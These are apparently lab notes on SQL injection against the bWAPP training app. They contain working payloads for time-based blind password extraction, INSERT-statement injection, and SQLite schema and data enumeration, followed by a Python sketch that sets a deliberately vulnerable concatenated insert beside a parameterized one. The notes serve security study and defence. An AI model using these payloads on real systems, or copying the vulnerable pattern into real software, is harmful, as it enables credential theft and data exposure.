- Blind SQL injection (login form / user)
SELECT * FROM users WHERE login = 'bee' AND ((SELECT IF(SUBSTRING(password,1,1) = '6', SLEEP(5), null) FROM users WHERE login = 'bee'))#
- Bypass sanitization by addslashes and mysql_real_escape_string
- Server Side Includes (SSI) injection and its causes
- SQL injection with INSERT Statement
INSERT INTO BLOG (data, entry, owner) values (now(), 'a', (SELECT version()))#
Time-based SQL injection can also happen within an INSERT statement:
INSERT INTO BLOG (data, entry, owner) values (now(), 'a', (SELECT IF(substring(password,1,1) = "6", sleep(5), null) from users where id = 2))#
- SQLite Database Injection
INSERT INTO blog (id, date, entry, owner) VALUES (16,'2020-12-26','atesting', (select sqlite_version())) -- ','bee');
Table Names:
atesting', (SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') )--
Column Names:
atesting', (SELECT sql FROM sqlite_master WHERE type!="meta" AND sql NOT NULL AND name = "blog") )--
Data!!!
atesting', (select entry from blog limit 1) )--
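
Why the INSERT payloads above work, and what stops them: the sketch below is an added example, not part of the original notes. It runs the `sqlite_version()` entry from the SQLite section against an in-memory database, once through string concatenation and once through bound parameters. The table layout is assumed from the columns in the INSERT above, and the helper names are hypothetical.

```python
import sqlite3

# Entry value taken verbatim from the SQLite notes above.
PAYLOAD = "atesting', (select sqlite_version())) -- "

def new_db():
    # Assumed schema: only the column names come from the notes.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE blog (id INTEGER PRIMARY KEY, "
               "date TEXT, entry TEXT, owner TEXT)")
    return db

def add_entry_vulnerable(db, entry, owner):
    # Concatenation: a quote inside `entry` ends the string literal, so the
    # rest of the input is parsed as SQL and the real owner is commented out.
    sql = ("INSERT INTO blog (date, entry, owner) VALUES "
           "('2020-12-26', '" + entry + "', '" + owner + "')")
    db.execute(sql)

def add_entry_safe(db, entry, owner):
    # Bound parameters: the driver passes `entry` as a value, never as SQL.
    db.execute("INSERT INTO blog (date, entry, owner) "
               "VALUES ('2020-12-26', ?, ?)", (entry, owner))

def last_row(db):
    return db.execute("SELECT entry, owner FROM blog "
                      "ORDER BY id DESC LIMIT 1").fetchone()

def demo():
    db = new_db()
    add_entry_vulnerable(db, PAYLOAD, "bee")
    vulnerable = last_row(db)   # owner column now holds the subquery result
    add_entry_safe(db, PAYLOAD, "bee")
    safe = last_row(db)         # payload stored as inert text, owner intact
    return vulnerable, safe

if __name__ == "__main__":
    vulnerable, safe = demo()
    print("concatenated:", vulnerable)
    print("parameterized:", safe)
```

In the concatenated case the owner column carries the database version back to whoever views the blog; in the parameterized case the same input is stored as a literal string.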